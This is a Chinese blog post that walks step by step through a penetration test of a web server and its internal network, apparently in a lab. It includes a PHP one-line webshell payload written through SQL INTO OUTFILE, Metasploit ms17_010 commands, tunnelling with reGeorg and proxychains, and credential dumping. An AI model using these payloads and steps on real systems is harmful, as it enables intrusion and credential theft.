一次完整内网渗透

Posted on 2019-06-03 16:55  小二班开讲啦  阅读(539)  评论(0)    收藏  举报

1暴力破解

进入网站发现有登陆,开启代理,启动burp进行暴力破解

 

 成功破解获密码为admin23

 

 2sql注入

在如下注释出发现sql注入

 

 使用sql map成功跑出网站后台账户与密码

 

 使用somd5破解密码为mysql123

 

 3获取shell

访问域名192.168.31.196可得到探针,从中得到当前网站目录

 

 在使用获得的后台账号进入后,在数据维护中可执行sql语句,我们执行上传一句话语句select "<?php eval($_POST[‘pass’]);?>" into outfile "C:/UPUPW_AP5.2/htdocs/235.php"

 

 接着访问一下出现空白页面成功

 

 使用菜刀连接成功

 

 4远程连接

先将一个大马上传

 

 在大马中利用命令创建一个超级管理员

 

 访问3386端口登陆自己创建的账号,成功连接

 

 5垂直越权创建后台超级管理员

在修改密码添加管理员处,开启抓包

 

 将原先的submanage改为manage权限

 

将包放掉后发现可以添加,进行添加并再次抓包进行提权

 

 将包放掉后,发现提示操作成功

 

 再用添加的账号进行登陆,成功添加为超级管理员

 6代理隧道

kalireGeorg开启隧道

 

 kali使用工具 proxychains输入# vi /etc/proxychains.conf执行以上命令后,打开文件proxychains.conf文件中的dynamic_chain前面的注释符取消,添加代理服务器到列表(proxychains.conf文件末尾)socks5 127.0.0.1 9986.

 

 通过用户想要使用的应用程序运行ProxyChains启动firefox执行命令如下所示:root@kali:~# proxychains firefox

 

 成功访问内网ip

 

7内网渗透

通过大马执行命令arp-a发现内网的两台服务器ip为192.168.238.129和192.168.238.130

用nmap -vvv -n -sT -PN [ip]命令扫描这两个ip

代理msf,使msf可以使用

 

利用ms17_010的漏洞

设置好利用ms17_010所需要的参数
use exploit/windows/smb/ms17_010_psexec #切换到ms17漏洞模块
set RHOST 192.168.238.129 #设置目标机ip

set LHOST 192.168.238.129 #设置本机ip

exlioit #开始连接

成功了msf5就会变成meterpreter,显然这里是成功了的

利用脚本获取服务器用户及哈希(红框标注)

哈希解密可得到密码为admin123

另一个用猕猴桃得到明文密码

  • 使用命令开启目标主机的3389端口

 

 

  • 使用代理打开rdesktop,尝试连接内网目标主机